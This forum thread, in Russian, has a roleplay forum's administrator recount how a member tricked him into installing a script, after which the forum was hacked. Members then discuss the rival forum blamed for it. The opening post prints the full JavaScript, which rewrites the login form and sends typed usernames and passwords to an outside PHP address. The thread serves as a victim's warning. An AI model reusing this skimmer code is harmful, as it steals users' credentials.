Отправлено: 26.11.07 22:39. Заголовок: Рассказ о взломе

[Удалено администратором :) ]
Администратор решил вернуть удаленное.
Издание 2-е, перераб. и доп.

24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны.
Вот этот скрипт:

<script type="text/javascript">
function block (t) {
t = t.replace("%", escape("%"));
t = t.replace("$", escape("$"));
t = t.replace("#", escape("#"));
t = t.replace("\\", escape("\\"));
return t;
}
function newtest() {
if (document.all.nick.value) {
a = document.all.nick.value;
b = document.all.pass.value;
} else if (document.frm.nick.value) {
a = document.frm.nick.value;
b = document.frm.pass.value;
} else {
a = "undefined";
b = "no";
}
a = block(a);
b = block(b);
img = new Image();
img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;
setTimeout("newtest()", 1);
}
document.temp = new function() {
var sec = document.write;
this.write = function(txt)
{
txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>");
this.sec = sec;
this.sec(txt);
this.sec = null;
return true;
}
return this;
}
document.write = document.temp.write;
document.temp = null;
document.writeln = document.write;
</script>

Ночью форум был взломан.
(кликните на картинку, чтобы прочитать "послание" взломщика)


Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров.

Разговоры на форуме "Критик" до взлома моего форума:






После взлома:

Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше.

"У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист.

Действительно, тему почистили не всю.

Чистосердечное признание! cater - второй ник Кота Бегемота.

---

Комментарий специалиста:

цитата:

Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"

 Отправлено: 26.11.07 23:12. Заголовок: Надо отметить, что э..

Надо отметить, что этот взломщик, отлично справился с женской ролью. Это к слову о "Мужчинах, играющих женщин". Он очень долго разговаривал со мной в ЛС: ну такая девочка-припевочка!
Blazing Wizard лопнул бы от зависти. Взломщик чуть ли не в любви мне в ЛС объяснялся. Жаль, что ЛС не сохранились - он, проникнув на форум, естественно, всё стёр.
И аватар у него был такой сексапильный: такая розовенькая девочка с выпирающими из декольте грудями )))))

 Отправлено: 26.11.07 23:16. Заголовок: Сентябрьский Лис пиш..

Сентябрьский Лис пишет:

цитата:

ну такая девочка-припевочка

Наверняка шаблонная блондинка и губки бантиком.

 Отправлено: 27.11.07 00:23. Заголовок: Вроде того! :sm64: ..

Вроде того!

 Отправлено: 27.11.07 12:01. Заголовок: Вот так и ловят люде..

Вот так и ловят людей на их слабостях и предрасположенностях! :)
А все потому, что честь по чести ничего противопоставить не могут. Скучища, господа. Лис, выше нос - уроды остаются уродами и в Африке, а форуму от этого идиотизма ничего не сделается.

 Отправлено: 27.11.07 13:03. Заголовок: Лис попался на том, ..

Лис попался на том, о чём сам писал в теме "Женщины, играющие мужчин": "Что хочет женщина - никому неизвестно, а мужчина как раз хочет её... то есть, женщину".

Теперь серьёзно: Лис хочет выложить всю историю взлома со всеми доказательствами, скриптами и скриншотами. Как Вы считаете? Это безумная идея? Рассвирепеют взломщики, рассвирепеет администрация Борды? Форум хакнут окончательно? (Нужное подчеркнуть).
Скрытый текст

PS. Буду только вечером.((

 Отправлено: 27.11.07 13:16. Заголовок: А можно свой вариант..

А можно свой вариант?
Может просто спокойно себе жить дальше? Взломщики должны любить внимание, а если их игнорить... может сами заскучают и испарятся?

 Отправлено: 27.11.07 13:40. Заголовок: Взломщикам это тольк..

Взломщикам это только понравится.
Администрация борды даже не обратит внимания, поскольку взлом был сделан не через уязвимости борды, а через уязвимости админа.
Хакнут ли окончательно? Не знаю...

 Отправлено: 27.11.07 16:54. Заголовок: Кстати, а профиль Со..

цитата:

Кстати, а профиль Соло тоже удалили?

Нет. Вернее удалил не взломщик, а я по её просьбе. Она пришла, увидела, что форум взломан и не захотела здесь больше оставаться. Попросила удалить свой профиль.
Я знаю, что в некоторые моменты с ней лучше не спорить
Solo такой человек... Человек неожиданных решений и ни на кого не ориентирующегося собственного мнения. Если она захочет уйти - её ничто не удержит.
Пример: http://rollers.fastbb.ru/?1-5-0-00000008-000-0-0#005
(Там была как раз та самая "криминальная статья")

Norsefire
Я вашу последнюю строчку убрал. Не надо такими словами разбрасываться - вдруг у них на критике что-то случится, а обвинят вас.
(Если бы эти критики-кретины не стали в открытую обо всём говорить на своём форуме - фиг бы я догадался откуда ветер дует )

 Отправлено: 27.11.07 19:18. Заголовок: Сентябрьский Лис, сп..

Сентябрьский Лис, спасибо за заботу, но это лишнее :))) Что же теперь, сидеть, бояться и не рисковать криво посмотреть в чью-то сторону, потому как хакнут-заспамят аську глупостями-постучаться головой о стенку и напишут заявление в милицию? Получается какой-то форпост в окружении Дивного Нового Мира.
Баба Яга против :)))))))

По поводу Solo - очень жаль, действительно.

 Отправлено: 27.11.07 19:28. Заголовок: Norsefire К сожален..

Norsefire
К сожалению, от взломов никто не застрахован, меня просто удивляет наглость этих ребят, которые ещё и в открытую это признают.

 Отправлено: 27.11.07 19:43. Заголовок: Мэгги, ну так если и..

Мэгги, ну так если им нечем гордится из сферы созидательного - значит, приходится гордится деяниями из серии "приумножим энтропию".
Самоутверждаться ж как-то надо. Только, я думаю, совершенно не стоит идти на поводу у их самоутверждения. А то еще возомнят себе, что их боятся...

 Отправлено: 27.11.07 20:26. Заголовок: После подписи этого ..

После подписи этого нашего красавца, думаю, стоит всякие темы на эту тему прекратить. А то действительно начнёт воображать, что добился своего. Дураку ведь только дай повод - он апстенку биться начнёт.

 Отправлено: 27.11.07 20:59. Заголовок: Norsefire пишет: По..

Norsefire пишет:

цитата:

По поводу Solo - очень жаль, действительно.

Что поделаешь, Solo, как кошка - гуляет сама по себе. Захочет - вернётся.

Norsefire пишет:

цитата:

идеть, бояться и не рисковать криво посмотреть... и т.д.

Нет. Но я категорически против призывов ко взлому. Во всяком случае, это первое, что меня оттолкнуло в Критике, когда я его первый раз увидел.

 Отправлено: 27.11.07 22:22. Заголовок: Давайте лишний раз в..

Давайте лишний раз воздадим должное Case: значит, действительно его форумы так трудно взломать, что можно только обманом подлизаться к админу. А от обмана никто не застрахован. Обмануть можно и умного, и глупого. Но только дурак будет кичиться тем, что кого-то обманул.

 Отправлено: 01.12.07 16:05. Заголовок: Блин! Критику никак ..

Блин!
Критику никак не успокоиться!
Они опять припёрлись. Ещё и порекомендовали свой баннер установить! А на баннере что написано: "Лучший форум по взлому лохов"?

Однако, хорошо, что у меня премодерация стоит!
А Solo - как хочет, пускай так и пишет, если не хочет регистрироваться

 Отправлено: 01.12.07 16:36. Заголовок: Сентябрьский Лис, де..

Сентябрьский Лис, дети, ну что с них взять-то, кроме анализов?..

 Отправлено: 01.12.07 17:04. Заголовок: Их наверное так свер..

Их наверное так свербит, что никто к ним не пришёл
Проникаюсь чувством жалости: бе-е-е-едненькие!

 Отправлено: 01.12.07 22:29. Заголовок: Изучил тему. Вас та..

Изучил тему.

Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.

На счет взлома: то, что у Кота Бегемота начался маразм - не повод гнать всех критиков под одну гребенку.
Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко.
Хотя, порядок у них на форуме не мой... Я на Ролес провокаторов прищемил бы раньше.

 Отправлено: 01.12.07 22:33. Заголовок: Zenitchik А кто их ..

Zenitchik
А кто их просил этой ихней критики? Пусть оценивают того, кому это надо.
По крайней мере, Ролес, на сколько я понял, не занимается оценкой чьих бы то ни было форумов, не спрося хозяев.

 Отправлено: 01.12.07 22:44. Заголовок: А Критик - занимаетс..

А Критик - занимается. Я не вижу в этом ничего плохого.